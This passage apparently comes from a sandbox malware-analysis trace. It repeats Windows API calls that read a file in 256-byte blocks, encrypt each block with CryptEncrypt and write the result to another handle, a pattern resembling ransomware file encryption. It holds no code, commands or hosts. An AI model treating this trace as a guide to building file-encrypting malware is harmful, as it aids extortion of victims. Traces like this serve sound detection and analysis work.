nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.308] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.308] GetLastError () returned 0x0 [0145.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.308] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.308] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.308] GetLastError () returned 0x0 [0145.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.308] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.308] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.308] GetLastError () returned 0x0 [0145.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.308] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.308] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.308] GetLastError () returned 0x0 [0145.308] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.309] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.309] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.309] GetLastError () returned 0x0 [0145.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.309] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.309] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.309] GetLastError () returned 0x0 [0145.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.309] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.309] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.309] GetLastError () returned 0x0 [0145.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.309] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.309] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.309] GetLastError () returned 0x0 [0145.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.309] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.309] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.309] GetLastError () returned 0x0 [0145.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.309] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.309] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.309] GetLastError () returned 0x0 [0145.309] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.309] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.310] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.310] GetLastError () returned 0x0 [0145.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.310] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.310] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.310] GetLastError () returned 0x0 [0145.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.310] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.310] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.310] GetLastError () returned 0x0 [0145.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.310] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.310] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.310] GetLastError () returned 0x0 [0145.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.310] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.310] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.310] GetLastError () returned 0x0 [0145.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.310] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.310] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.310] GetLastError () returned 0x0 [0145.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.310] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.310] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.310] GetLastError () returned 0x0 [0145.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.311] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.311] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.311] GetLastError () returned 0x0 [0145.311] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.311] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.311] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.311] GetLastError () returned 0x0 [0145.311] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.311] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.311] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.311] GetLastError () returned 0x0 [0145.311] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.311] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.311] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.311] GetLastError () returned 0x0 [0145.311] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.311] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.311] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.311] GetLastError () returned 0x0 [0145.311] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.311] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.311] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.311] GetLastError () returned 0x0 [0145.311] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.311] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.311] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.312] GetLastError () returned 0x0 [0145.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.312] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.312] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.312] GetLastError () returned 0x0 [0145.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.312] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.312] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.312] GetLastError () returned 0x0 [0145.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.312] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.312] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.312] GetLastError () returned 0x0 [0145.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.312] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.312] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.312] GetLastError () returned 0x0 [0145.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.312] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.312] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.312] GetLastError () returned 0x0 [0145.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.312] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.312] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.312] GetLastError () returned 0x0 [0145.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.313] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.313] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.313] GetLastError () returned 0x0 [0145.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.313] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.313] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.313] GetLastError () returned 0x0 [0145.313] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.313] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: 